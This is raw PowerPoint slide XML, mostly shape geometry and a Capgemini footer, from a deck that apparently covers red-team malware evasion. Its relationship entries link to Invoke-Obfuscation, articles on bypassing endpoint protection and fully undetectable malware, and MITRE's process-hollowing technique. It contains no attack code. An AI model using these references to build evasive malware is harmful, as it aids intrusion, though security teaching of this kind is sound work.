                  <a:moveTo>
                    <a:pt x="116" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116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29"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11466459" y="6130297"/>
              <a:ext cx="47949" cy="24919"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 121 w 127"/>
                <a:gd name="T1" fmla="*/ 0 h 66"/>
                <a:gd name="T2" fmla="*/ 127 w 127"/>
                <a:gd name="T3" fmla="*/ 13 h 66"/>
                <a:gd name="T4" fmla="*/ 5 w 127"/>
                <a:gd name="T5" fmla="*/ 66 h 66"/>
                <a:gd name="T6" fmla="*/ 0 w 127"/>
                <a:gd name="T7" fmla="*/ 53 h 66"/>
                <a:gd name="T8" fmla="*/ 121 w 127"/>
                <a:gd name="T9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66">
                  <a:moveTo>
                    <a:pt x="121" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="127" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121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30"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11430034" y="6146658"/>
              <a:ext cx="49837" cy="20766"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 127 w 132"/>
                <a:gd name="T1" fmla="*/ 0 h 55"/>
                <a:gd name="T2" fmla="*/ 132 w 132"/>
                <a:gd name="T3" fmla="*/ 13 h 55"/>
                <a:gd name="T4" fmla="*/ 6 w 132"/>
                <a:gd name="T5" fmla="*/ 55 h 55"/>
                <a:gd name="T6" fmla="*/ 0 w 132"/>
                <a:gd name="T7" fmla="*/ 42 h 55"/>
                <a:gd name="T8" fmla="*/ 127 w 132"/>
                <a:gd name="T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55">
                  <a:moveTo>
                    <a:pt x="127" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="132" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127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31"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11395623" y="6167305"/>
              <a:ext cx="49837" cy="15857"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 129 w 132"/>
                <a:gd name="T1" fmla="*/ 0 h 42"/>
                <a:gd name="T2" fmla="*/ 132 w 132"/>
                <a:gd name="T3" fmla="*/ 13 h 42"/>
                <a:gd name="T4" fmla="*/ 2 w 132"/>
                <a:gd name="T5" fmla="*/ 42 h 42"/>
                <a:gd name="T6" fmla="*/ 0 w 132"/>
                <a:gd name="T7" fmla="*/ 31 h 42"/>
                <a:gd name="T8" fmla="*/ 129 w 132"/>
                <a:gd name="T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42">
                  <a:moveTo>
                    <a:pt x="129" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="132" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129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32"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11362163" y="6189465"/>
              <a:ext cx="50970" cy="12837"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 135"/>
                <a:gd name="T1" fmla="*/ 0 h 34"/>
                <a:gd name="T2" fmla="*/ 135 w 135"/>
                <a:gd name="T3" fmla="*/ 13 h 34"/>
                <a:gd name="T4" fmla="*/ 3 w 135"/>
                <a:gd name="T5" fmla="*/ 34 h 34"/>
                <a:gd name="T6" fmla="*/ 0 w 135"/>
                <a:gd name="T7" fmla="*/ 21 h 34"/>
                <a:gd name="T8" fmla="*/ 132 w 135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34">
                  <a:moveTo>
                    <a:pt x="132" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132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33"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11331641" y="6215180"/>
              <a:ext cx="50592" cy="7929"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 134 w 134"/>
                <a:gd name="T1" fmla="*/ 0 h 21"/>
                <a:gd name="T2" fmla="*/ 134 w 134"/>
                <a:gd name="T3" fmla="*/ 13 h 21"/>
                <a:gd name="T4" fmla="*/ 2 w 134"/>
                <a:gd name="T5" fmla="*/ 21 h 21"/>
                <a:gd name="T6" fmla="*/ 0 w 134"/>
                <a:gd name="T7" fmla="*/ 8 h 21"/>
                <a:gd name="T8" fmla="*/ 134 w 134"/>
                <a:gd name="T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21">
                  <a:moveTo>
                    <a:pt x="134" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="134" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="0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34"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11302389" y="6242168"/>
              <a:ext cx="50970" cy="5663"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 135 w 135"/>
                <a:gd name="T1" fmla="*/ 2 h 15"/>
                <a:gd name="T2" fmla="*/ 135 w 135"/>
                <a:gd name="T3" fmla="*/ 15 h 15"/>
                <a:gd name="T4" fmla="*/ 0 w 135"/>
                <a:gd name="T5" fmla="*/ 13 h 15"/>
                <a:gd name="T6" fmla="*/ 0 w 135"/>
                <a:gd name="T7" fmla="*/ 0 h 15"/>
                <a:gd name="T8" fmla="*/ 135 w 135"/>
                <a:gd name="T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5">
                  <a:moveTo>
                    <a:pt x="135" y="2"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135" y="15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35" y="2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35"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11275396" y="6267888"/>
              <a:ext cx="50970" cy="9816"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 135 w 135"/>
                <a:gd name="T1" fmla="*/ 13 h 26"/>
                <a:gd name="T2" fmla="*/ 132 w 135"/>
                <a:gd name="T3" fmla="*/ 26 h 26"/>
                <a:gd name="T4" fmla="*/ 0 w 135"/>
                <a:gd name="T5" fmla="*/ 13 h 26"/>
                <a:gd name="T6" fmla="*/ 0 w 135"/>
                <a:gd name="T7" fmla="*/ 0 h 26"/>
                <a:gd name="T8" fmla="*/ 135 w 135"/>
                <a:gd name="T9" fmla="*/ 1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26">
                  <a:moveTo>
                    <a:pt x="135" y="13"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="132" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="13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36"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11251790" y="6296127"/>
              <a:ext cx="50970" cy="13970"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 135 w 135"/>
                <a:gd name="T1" fmla="*/ 26 h 37"/>
                <a:gd name="T2" fmla="*/ 132 w 135"/>
                <a:gd name="T3" fmla="*/ 37 h 37"/>
                <a:gd name="T4" fmla="*/ 0 w 135"/>
                <a:gd name="T5" fmla="*/ 13 h 37"/>
                <a:gd name="T6" fmla="*/ 3 w 135"/>
                <a:gd name="T7" fmla="*/ 0 h 37"/>
                <a:gd name="T8" fmla="*/ 135 w 135"/>
                <a:gd name="T9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37">
                  <a:moveTo>
                    <a:pt x="135" y="26"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="132" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="26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37"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11230564" y="6326219"/>
              <a:ext cx="49837" cy="17745"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 132"/>
                <a:gd name="T1" fmla="*/ 37 h 47"/>
                <a:gd name="T2" fmla="*/ 127 w 132"/>
                <a:gd name="T3" fmla="*/ 47 h 47"/>
                <a:gd name="T4" fmla="*/ 0 w 132"/>
                <a:gd name="T5" fmla="*/ 13 h 47"/>
                <a:gd name="T6" fmla="*/ 3 w 132"/>
                <a:gd name="T7" fmla="*/ 0 h 47"/>
                <a:gd name="T8" fmla="*/ 132 w 132"/>
                <a:gd name="T9" fmla="*/ 3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" h="47">
                  <a:moveTo>
                    <a:pt x="132" y="37"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="127" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132" y="37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38"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11212604" y="6358238"/>
              <a:ext cx="48705" cy="21898"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 129 w 129"/>
                <a:gd name="T1" fmla="*/ 48 h 58"/>
                <a:gd name="T2" fmla="*/ 124 w 129"/>
                <a:gd name="T3" fmla="*/ 58 h 58"/>
                <a:gd name="T4" fmla="*/ 0 w 129"/>
                <a:gd name="T5" fmla="*/ 13 h 58"/>
                <a:gd name="T6" fmla="*/ 5 w 129"/>
                <a:gd name="T7" fmla="*/ 0 h 58"/>
                <a:gd name="T8" fmla="*/ 129 w 129"/>
                <a:gd name="T9" fmla="*/ 4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58">
                  <a:moveTo>
                    <a:pt x="129" y="48"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="48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39"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11197337" y="6392146"/>
              <a:ext cx="47949" cy="25674"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 127 w 127"/>
                <a:gd name="T1" fmla="*/ 55 h 68"/>
                <a:gd name="T2" fmla="*/ 121 w 127"/>
                <a:gd name="T3" fmla="*/ 68 h 68"/>
                <a:gd name="T4" fmla="*/ 0 w 127"/>
                <a:gd name="T5" fmla="*/ 10 h 68"/>
                <a:gd name="T6" fmla="*/ 8 w 127"/>
                <a:gd name="T7" fmla="*/ 0 h 68"/>
                <a:gd name="T8" fmla="*/ 127 w 127"/>
                <a:gd name="T9" fmla="*/ 55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68">
                  <a:moveTo>
                    <a:pt x="127" y="55"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="121" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="55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40"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11185828" y="6426241"/>
              <a:ext cx="46062" cy="29827"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 122 w 122"/>
                <a:gd name="T1" fmla="*/ 69 h 79"/>
                <a:gd name="T2" fmla="*/ 116 w 122"/>
                <a:gd name="T3" fmla="*/ 79 h 79"/>
                <a:gd name="T4" fmla="*/ 0 w 122"/>
                <a:gd name="T5" fmla="*/ 13 h 79"/>
                <a:gd name="T6" fmla="*/ 8 w 122"/>
                <a:gd name="T7" fmla="*/ 0 h 79"/>
                <a:gd name="T8" fmla="*/ 122 w 122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79">
                  <a:moveTo>
                    <a:pt x="122" y="69"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116" y="79"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="69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41"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11176993" y="6461890"/>
              <a:ext cx="43796" cy="33980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 116 w 116"/>
                <a:gd name="T1" fmla="*/ 79 h 90"/>
                <a:gd name="T2" fmla="*/ 108 w 116"/>
                <a:gd name="T3" fmla="*/ 90 h 90"/>
                <a:gd name="T4" fmla="*/ 0 w 116"/>
                <a:gd name="T5" fmla="*/ 11 h 90"/>
                <a:gd name="T6" fmla="*/ 7 w 116"/>
                <a:gd name="T7" fmla="*/ 0 h 90"/>
                <a:gd name="T8" fmla="*/ 116 w 116"/>
                <a:gd name="T9" fmla="*/ 79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" h="90">
                  <a:moveTo>
                    <a:pt x="116" y="79"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="79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42"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11171815" y="6499471"/>
              <a:ext cx="41909" cy="35868"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 111"/>
                <a:gd name="T1" fmla="*/ 84 h 95"/>
                <a:gd name="T2" fmla="*/ 103 w 111"/>
                <a:gd name="T3" fmla="*/ 95 h 95"/>
                <a:gd name="T4" fmla="*/ 0 w 111"/>
                <a:gd name="T5" fmla="*/ 11 h 95"/>
                <a:gd name="T6" fmla="*/ 10 w 111"/>
                <a:gd name="T7" fmla="*/ 0 h 95"/>
                <a:gd name="T8" fmla="*/ 111 w 111"/>
                <a:gd name="T9" fmla="*/ 8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95">
                  <a:moveTo>
                    <a:pt x="111" y="84"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="84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43"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11170216" y="6535914"/>
              <a:ext cx="38511" cy="38888"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 102"/>
                <a:gd name="T1" fmla="*/ 95 h 103"/>
                <a:gd name="T2" fmla="*/ 92 w 102"/>
                <a:gd name="T3" fmla="*/ 103 h 103"/>
                <a:gd name="T4" fmla="*/ 0 w 102"/>
                <a:gd name="T5" fmla="*/ 11 h 103"/>
                <a:gd name="T6" fmla="*/ 8 w 102"/>
                <a:gd name="T7" fmla="*/ 0 h 103"/>
                <a:gd name="T8" fmla="*/ 102 w 102"/>
                <a:gd name="T9" fmla="*/ 9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03">
                  <a:moveTo>
                    <a:pt x="102" y="95"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="92" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="95"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grpFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="01D1D0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" name="Retângulo 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25FC8637-25BD-4C09-AF25-56B4243DAB3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11784013" y="6555758"/>
            <a:ext cx="24237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fld id="{0502E5A9-B53C-401E-A0E0-4A359BB0A9E5}" type="slidenum">
              <a:rPr lang="en-US" sz="800" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr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F2EB016D-CF9A-4584-982E-40465F70132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407988" y="404813"/>
            <a:ext cx="11016604" cy="86360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lvl="0">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="pt-PT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25EEA1D4-3AF7-42D7-AE97-AE404AECFA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1836" t="-4713" b="16530"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11547793" y="188640"/>
            <a:ext cx="424356" cy="459624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="Group 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="413543" y="6555758"/>
            <a:ext cx="5128700" cy="219562"/>
            <a:chOff x="413543" y="6555758"/>
            <a:chExt cx="5128700" cy="219562"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 27">
              <a:hlinkClick r:id="rId4"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F376ABD1-4930-42EB-9A73-9A9C7C6BF2D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="413543" y="6555758"/>
              <a:ext cx="2786857" cy="219562"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Capgemini</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="800" kern="0" baseline="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Identity As A Service: IDaaS | March 2019</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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6B6D7F6B-C184-4C2B-8EB7-067E0C1E8DF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3259479" y="6587751"/>
              <a:ext cx="0" cy="155576"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:schemeClr val="tx2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tângulo 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{834ADCB4-BFB1-450D-8F6D-64217F4CD92C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3318557" y="6555811"/>
              <a:ext cx="2223686" cy="219456"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>© 2019 Capgemini. All rights reserved.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2588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45ECA-FF90-A942-BA49-4D2B86251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637505-4A98-4E44-A1BF-6E4EF43611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D0A123-C3F9-224C-B2BA-9123BB40D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E4899B-5594-4E45-8D44-03AB53567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6D4E4-7F30-814C-8649-83B5BA675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65559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59909-2352-4F45-ABF5-C3966440F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39DDED-1312-2543-AB46-89639E2F4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123BC-B783-7F48-9743-8697F06E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373E8-D10B-4E45-8C8C-29F280B5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F7D85-E826-BD40-8BE8-64C77905E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10334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1620-7A64-044A-A1B8-56447DFFD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EECAD0-EDF6-FF48-8FE7-B583153C6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1D446D-CB57-9341-9954-0081D321A9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45B86F-C6D5-B74A-9F19-D00A0F48E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3F4BA5-7FDF-9E40-8E02-84E18EBEC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6CCAA6-4D47-C04B-9559-BBC56E9CD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16873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F97D4-C1B1-6F48-B6D8-D72E95FF7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3C4DBB-B117-704D-9F9F-D16F9B851F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46C1D-2BC4-CF4B-A3A9-CC45CE7C5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4FDBBD-C8BF-2940-96DA-7A87905FC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28E641-8A7D-8A4F-A111-6D7A2DE1CB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4862D2-D8FD-C04E-97B3-5C31B7222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C70B8D-8C8D-B245-8120-3967DD441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3526C2-F1BF-664E-8971-516905496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28407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677F4-0338-604B-A61E-8A551D823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84403-35F6-CD4D-9EE4-69EF06C5D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EBD1C9-CD12-9343-B4CC-28EC89CF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5D122C-DC25-0E47-A7DB-9F3AF5941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00847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803B4A-8FF4-D648-B394-DC2616253F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75652F-65E1-3A47-9F17-6A203996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321A2-C501-5A40-A196-B3510EF8C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24826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307A0-8471-6B48-897B-9C5C6EB11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9DA7EE-EFF1-E549-AC29-BDB88B1F92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1536D6-C3D5-7F47-9D9D-D1C855696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0C701-15A1-6745-AB08-4587BC5A1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0D23F4-B8A0-D74E-A4DE-F15E8947E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EEB97-F6F0-724C-A74B-2B1D4347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2569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5E23A-E822-2843-B34B-48D831CA8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E4D393-B6C1-3041-B725-26A878632A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42C1DA-4E28-CB4D-A853-B1192961CC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6C37F-89B9-EC47-804C-1B31A0BCB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E7E505-A895-F04E-851A-DCF2D65D8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B2788-2CDE-D14C-AD08-12C28828A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9305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789FC4-CF07-F54B-9352-AC4FB326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871E18-BE71-4E49-86AA-DAE4D58E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FDFD9-8486-C24E-9783-25BADF510E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BF23B-9A6D-6D43-BFD1-A4F76F61E70C}" type="datetimeFigureOut">
              <a:rPr lang="en-NL" smtClean="0"/>
              <a:t>20/08/2020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A9997-E989-4442-B8F0-2031FD64B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5072E-A172-B74E-A6ED-51AF62178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81422-044E-F24B-8672-107EE1617AA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10794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customXml" Target="../ink/ink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microsoft.com/en-gb/windows/win32/api/synchapi/nf-synchapi-createmutexa?redirectedfrom=MSDN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customXml" Target="../ink/ink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github.com/danielbohannon/Invoke-Obfuscation" TargetMode="Externa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hyperlink" Target="https://bufferoverflows.net/the-art-of-bypassing-endpoint-protections-for-red-teaming-engagements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ybersecurity.att.com/blogs/labs-research/malware-exploring-mutex-objects#:~:text=December%2028%2C%202009%20%7C%20Jaime%20Blasco,to%20share%20the%20same%20resource." TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.foregenix.com/blog/penetration-testing-the-quest-for-fully-undetectable-malware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attack.mitre.org/techniques/T1055/012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tiff"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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tiff"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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image" Target="../media/image21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image" Target="../media/image20.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId16" 